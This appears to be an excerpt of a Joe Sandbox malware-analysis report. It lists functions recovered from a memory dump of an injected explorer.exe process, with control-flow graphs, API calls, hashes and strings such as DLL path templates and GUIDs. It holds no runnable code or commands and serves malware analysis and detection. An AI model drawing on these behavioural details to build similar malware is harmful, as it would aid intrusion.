                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SleepTimetime
                                                          • String ID:
                                                          • API String ID: 346578373-0
                                                          • Opcode ID: 19105abb902b3a905c21a310206c065eacad09e6ebd9064add6f77d9345c1f2b
                                                          • Instruction ID: 2aaaedd09aea2bc4fb44e3ea37617e215bdecfbcbf19fb433c990af471d4ab42
                                                          • Opcode Fuzzy Hash: 19105abb902b3a905c21a310206c065eacad09e6ebd9064add6f77d9345c1f2b
                                                          • Instruction Fuzzy Hash: D8419DB3F0C2008FD7009E76C8853E973A2E705778B4A0929CB585BFA9E7349C62DB44
                                                          Function 02CFE619 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 407 2cfe619-2cfe632 409 2cfe638 407->409 410 2cfe644-2cfe6a8 SleepEx 407->410 409->410 411 2cfe63e 409->411 413 2cfe6b8-2cfe6d4 410->413 411->410 415 2cfe6da 413->415 416 2cfe6e4-2cfe72e 413->416 415->416 418 2cfe734-2cfe73a 416->418 419 2cfe751-2cfe781 416->419 418->419
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 4c73c4f1335922a7aabd6fb3c8f0775b16f79e7072f2f213e468495de9b5999e
                                                          • Instruction ID: 90b1f686d97ac64dc7fc9e47d187da25b442791aa5b1e3573f589a8383ad3ab6
                                                          • Opcode Fuzzy Hash: 4c73c4f1335922a7aabd6fb3c8f0775b16f79e7072f2f213e468495de9b5999e
                                                          • Instruction Fuzzy Hash: 69218E77F4C258CF87C88F36C1440D937A1E658B2870A096ADB0A67BADD7707D62CB84
                                                          Function 02D01CD7 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 422 2d01cd7-2d01fa8 426 2d01fae-2d01fba 422->426 427 2d01fbf-2d02020 SleepEx call 2d0202b 422->427 426->427 429 2d02025-2d0202a 427->429
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: b5b6d237c5edb522a1d8395f8ee4cfa14632bbeada97cf8a3fc749039202217d
                                                          • Instruction ID: 1e88d5a9a0ced031e38859d9d961f9f77c08cc20f7c221d604fbe9265390b563
                                                          • Opcode Fuzzy Hash: b5b6d237c5edb522a1d8395f8ee4cfa14632bbeada97cf8a3fc749039202217d
                                                          • Instruction Fuzzy Hash: CA11A3B3F0C210CF97009E75C8452E932E2EB0D7B9B4A49759F48A7F98D7344C628B80
                                                          Function 02CFD869 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 430 2cfd869-2cfd8c0 SleepEx 433 2cfd8d2-2cfd90d call 2cfd912 430->433
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: c4e6546d5a1e30b17dae2e5458246ae282315a51b0e2e1adcdf1bf66874fc03a
                                                          • Instruction ID: 5d894b5fcfe2df88a20d927ca0e47df4021a68e7530c617f3a1ddca973d89a00
                                                          • Opcode Fuzzy Hash: c4e6546d5a1e30b17dae2e5458246ae282315a51b0e2e1adcdf1bf66874fc03a
                                                          • Instruction Fuzzy Hash: 09F0E223E0D2209FC7C86E7E94420F977E1DE98BA97518C3ACF1B47B44E63045E7AA50

                                                          Non-executed Functions

                                                          Function 029E3FF0 Relevance: 67.0, APIs: 37, Strings: 1, Instructions: 509threadsynchronizationtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CreateThread$EventResumeTimersetsockopt$ChangeConcurrency::details::platform::__ObjectQueueSingleWaitclosesocket
                                                          • String ID: d
                                                          • API String ID: 1946823053-2564639436
                                                          • Opcode ID: efc159c2be1775245038cb19da69486f6f15a999e5ff292135dda899a16e756c
                                                          • Instruction ID: 69e3a7d9c19a8ff6eccabe42e228cbee02239f802f8b1ee9f7b388263189aabc
                                                          • Opcode Fuzzy Hash: efc159c2be1775245038cb19da69486f6f15a999e5ff292135dda899a16e756c
                                                          • Instruction Fuzzy Hash: B652F832308B84C6DB64CB15F48836AB3A0F7D9B88F545516EA8E47BA8DF7DC585CB01
                                                          Function 029F11C4 Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 478COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                          • String ID: U
                                                          • API String ID: 3902385426-4171548499
                                                          • Opcode ID: 6c468ba770afc2376842c98a1db4a931ac4fafa1da07eb65174a7d38efa086f2
                                                          • Instruction ID: 3fea3a37ed33b5f778266ec6033d6c49a9a00d421d066eeb2d2c2f6570855c2f
                                                          • Opcode Fuzzy Hash: 6c468ba770afc2376842c98a1db4a931ac4fafa1da07eb65174a7d38efa086f2
                                                          • Instruction Fuzzy Hash: 6B021133314681CADBA0DF29E0443AEB766F789B98F550116EB8E87B68DB3DC545CB40
                                                          Function 029EB57C Relevance: 16.5, APIs: 8, Strings: 1, Instructions: 734COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: write_multi_char$_errno$_getptd_invalid_parameter_noinfowrite_char
                                                          • String ID: SOFTWARE\%s
                                                          • API String ID: 622798868-297323700
                                                          • Opcode ID: 0b5b87ca17aa8dd018cae88cdc7c866bbcffe112e1fe4a58e40386dea1f4154f
                                                          • Instruction ID: a998e176c84eb8e5d797ebec7bcd63d1dcdf3876aa49ebf994caa9539622517f
                                                          • Opcode Fuzzy Hash: 0b5b87ca17aa8dd018cae88cdc7c866bbcffe112e1fe4a58e40386dea1f4154f
                                                          • Instruction Fuzzy Hash: 1842017260878086EF268B69E46037E77B5F784B9CF14141ADF8B9BB94EB79C441CB40
                                                          Function 029F021C Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 162COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _set_error_mode
                                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                          • API String ID: 1949149715-4022980321
                                                          • Opcode ID: 5a05a6a4815a714f172f8fce3905549c7a75a8060f4d85210f4e16a234095b46
                                                          • Instruction ID: e179045e8031503bc9eda22d1408bae6d2c63ada6bbe54290ea461f5ba84ee93
                                                          • Opcode Fuzzy Hash: 5a05a6a4815a714f172f8fce3905549c7a75a8060f4d85210f4e16a234095b46
                                                          • Instruction Fuzzy Hash: 0651B13631878082EBE8EB25A854B6A735AFBC5788F944126EF9D43B49DF3DC1058B05
                                                          Function 029DDDD0 Relevance: .6, Instructions: 577COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a583ae86051e2f7dd8e1f5aad3c29afd1add19ea6dbc22acd9425ae77474c6f
                                                          • Instruction ID: 5a47f9c75121220a3884b0b0a5138eee7adb358563d8c2ccd17e2bd245f03d6f
                                                          • Opcode Fuzzy Hash: 5a583ae86051e2f7dd8e1f5aad3c29afd1add19ea6dbc22acd9425ae77474c6f
                                                          • Instruction Fuzzy Hash: 5C2264767181408F875CCB1CE8A162AB7E2E7CC744B44852DF69BC7B99DA38E911CF48
                                                          Function 029C7E40 Relevance: 270.0, APIs: 66, Strings: 88, Instructions: 482memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 439 29c7e40-29c7e6e call 29d2ab0 442 29c7e74-29c7e8f LocalAlloc 439->442 443 29c8861 439->443 444 29c7e95-29c7eb0 LocalAlloc 442->444 445 29c8856-29c885b LocalFree 442->445 446 29c8863-29c8867 443->446 447 29c884b-29c8850 LocalFree 444->447 448 29c7eb6-29c7ebb 444->448 445->443 447->445 449 29c7ebd-29c7f03 wnsprintfW * 2 448->449 450 29c7f08-29c7f0d 448->450 451 29c881f-29c8849 LocalFree 449->451 452 29c7f0f-29c7f55 wnsprintfW * 2 450->452 453 29c7f5a-29c7f5f 450->453 451->446 452->451 454 29c7fac-29c7fb1 453->454 455 29c7f61-29c7fa7 wnsprintfW * 2 453->455 456 29c7ffe-29c8003 454->456 457 29c7fb3-29c7ff9 wnsprintfW * 2 454->457 455->451 458 29c8005-29c804b wnsprintfW * 2 456->458 459 29c8050-29c8055 456->459 457->451 458->451 460 29c8057-29c809d wnsprintfW * 2 459->460 461 29c80a2-29c80a7 459->461 460->451 462 29c80a9-29c80ef wnsprintfW * 2 461->462 463 29c80f4-29c80f9 461->463 462->451 464 29c80fb-29c8141 wnsprintfW * 2 463->464 465 29c8146-29c814b 463->465 464->451 466 29c814d-29c8193 wnsprintfW * 2 465->466 467 29c8198-29c819d 465->467 466->451 468 29c819f-29c81e5 wnsprintfW * 2 467->468 469 29c81ea-29c81ef 467->469 468->451 470 29c823c-29c8241 469->470 471 29c81f1-29c8237 wnsprintfW * 2 469->471 472 29c828e-29c8293 470->472 473 29c8243-29c8289 wnsprintfW * 2 470->473 471->451 474 29c8295-29c82db wnsprintfW * 2 472->474 475 29c82e0-29c82e5 472->475 473->451 474->451 476 29c82e7-29c832d wnsprintfW * 2 475->476 477 29c8332-29c8337 475->477 476->451 478 29c8339-29c837f wnsprintfW * 2 477->478 479 29c8384-29c8389 477->479 478->451 480 29c838b-29c83d1 wnsprintfW * 2 479->480 481 29c83d6-29c83db 479->481 480->451 482 29c83dd-29c8423 wnsprintfW * 2 481->482 483 29c8428-29c842d 481->483 482->451 484 29c842f-29c8475 wnsprintfW * 2 483->484 485 29c847a-29c847f 483->485 484->451 486 29c84cc-29c84d1 485->486 487 29c8481-29c84c7 wnsprintfW * 2 485->487 488 29c851e-29c8523 486->488 489 29c84d3-29c8519 wnsprintfW * 2 486->489 487->451 490 29c8525-29c856b wnsprintfW * 2 488->490 491 29c8570-29c8575 488->491 489->451 490->451 492 29c8577-29c85bd wnsprintfW * 2 491->492 493 29c85c2-29c85c7 491->493 492->451 494 29c85c9-29c860f wnsprintfW * 2 493->494 495 29c8614-29c8619 493->495 494->451 496 29c861b-29c8661 wnsprintfW * 2 495->496 497 29c8666-29c866b 495->497 496->451 498 29c866d-29c86b3 wnsprintfW * 2 497->498 499 29c86b8-29c86bd 497->499 498->451 500 29c86bf-29c8705 wnsprintfW * 2 499->500 501 29c870a-29c870f 499->501 500->451 502 29c875c-29c8761 501->502 503 29c8711-29c8757 wnsprintfW * 2 501->503 504 29c87ab-29c87b0 502->504 505 29c8763-29c87a9 wnsprintfW * 2 502->505 503->451 506 29c87fa-29c881d LocalFree * 3 504->506 507 29c87b2-29c87f8 wnsprintfW * 2 504->507 505->451 506->446 507->451
                                                          APIs
                                                            • Part of subcall function 029D2AB0: SHGetKnownFolderPath.SHELL32 ref: 029D2ACF
                                                            • Part of subcall function 029D2AB0: LocalAlloc.KERNEL32 ref: 029D2AE3
                                                            • Part of subcall function 029D2AB0: wnsprintfW.SHLWAPI ref: 029D2B1C
                                                            • Part of subcall function 029D2AB0: CoTaskMemFree.COMBASE ref: 029D2B3D
                                                          • LocalAlloc.KERNEL32 ref: 029C7E7E
                                                          • LocalAlloc.KERNEL32 ref: 029C7E9F
                                                          • wnsprintfW.SHLWAPI ref: 029C7EDF
                                                          • wnsprintfW.SHLWAPI ref: 029C7EFD
                                                          • wnsprintfW.SHLWAPI ref: 029C7F31
                                                          • wnsprintfW.SHLWAPI ref: 029C7F4F
                                                          • LocalFree.KERNEL32 ref: 029C8824
                                                          • LocalFree.KERNEL32 ref: 029C8850
                                                          • LocalFree.KERNEL32 ref: 029C885B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.2777657533.00000000029C1000.00000040.00001000.00020000.00000000.sdmp, Offset: 029C0000, based on PE: true
                                                          • Associated: 0000000C.00000002.2777629317.00000000029C0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A05000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A2B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777657533.0000000002A36000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777807570.0000000002A38000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002A3A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002D8C000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DB8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2777832151.0000000002DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000C.00000002.2778242530.0000000002DC7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_29c0000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Local$wnsprintf$Free$Alloc$FolderKnownPathTask
                                                          • String ID: #$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL${298E0812-4BA4-4E1C-84C5-6F755BD16425}${2F8EDBBB-4305-4E37-9F5D-D46029D06473}${385736CC-F915-4F45-8D81-83C84C8604A5}${3EEE3668-C680-4CDE-971C-A54BC604231F}${4042FB95-45F4-445E-AB4D-74344E7DE2E8}${413C6ADE-83F1-4624-BC60-8E887424A864}${47FCB2AB-9DF6-4006-8F0D-24583A4DEA75}${48E5A75B-50D8-4696-AB0E-2E9B4B7B6D57}${5237EDE7-7D89-4DB2-A39D-84973F439E0B}${5270E41F-5C5E-4F5D-B5C9-A11A826C4A78}${536BF39D-4525-4DE6-B19F-BC14DDEBFBA1}${608F4377-6064-4DA4-AA31-97F8620D4CC4}${74E5DEE0-9B01-420C-A2BB-74D1009D8942}${809D19D0-8F63-4CA6-B7EC-833E968BCA85}${8573D3A9-1ABB-4ACF-A00D-728DBAE7F1C1}${89B29C4A-91F9-47E6-9292-8770F8D80C85}${937D6F2A-B50F-4DE1-8BA9-5688846A99D8}${9F506ADD-50E4-4A39-B947-046059670F12}${A4530890-43D8-4F78-83E4-D24FE59DAA27}${AC6EF50F-ED09-46B5-B02E-C2099B4B55EF}${ACDB4A1D-B352-4E11-8EB1-A179D1767609}${AE684C20-4FC7-4485-961E-DADC2B4498E3}${CA38B96C-0E6E-4CE9-96DE-4C5B89BCC221}${CC2B9B1A-0D70-4695-93F8-6D5DA08980DE}${D3338F60-F025-4108-8025-0D5F0CD560FF}${D9B68EC1-16AC-4DC7-B348-5E7643159B6A}${E744B961-BB93-439D-911B-E53D80F77FB8}${E77874DD-90E7-4C64-9BC3-4975DA70AA8D}${F8BD15CF-8B01-4A23-A517-A350E179020D}
                                                          • API String ID: 3806943089-3513930775
                                                          • Opcode ID: 6ee5ce8c9bae93b66d9e37986d5db7fea350060ba2e8ea2f8018d865bbf34a7a
                                                          • Instruction ID: c4b56f4c274985f262b1d1355d12a99facd9466b3d904c8c806277d9fc7f7c69
                                                          • Opcode Fuzzy Hash: 6ee5ce8c9bae93b66d9e37986d5db7fea350060ba2e8ea2f8018d865bbf34a7a
                                                          • Instruction Fuzzy Hash: 7252E632218A86D6EB50DF55F81839AB375F786744F504037EA8E43A68DF3CDA49CB42
